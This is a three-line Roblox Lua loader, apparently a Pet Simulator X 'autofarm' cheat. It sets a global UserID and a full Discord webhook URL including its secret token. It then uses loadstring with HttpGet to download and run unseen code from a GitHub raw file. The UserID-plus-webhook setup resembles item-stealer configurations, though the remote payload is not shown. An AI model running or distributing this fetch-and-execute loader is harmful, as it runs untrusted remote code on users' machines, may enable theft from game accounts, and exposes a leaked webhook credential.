_G.UserID = 1136436754
_G.WebHook = "https://discord.com/api/webhooks/1048251886760906812/uJ4Xbs5YrXU0wenM9__O-wY67ieS6xCgrF-tIUFG2rjUs7QyLSOoS1g5HpkJbhAxsCgr"
loadstring(game:HttpGet("https://raw.githubusercontent.com/SilenceScripts/PsxScripts.Lua/main/PsxAutofarm.true"))()
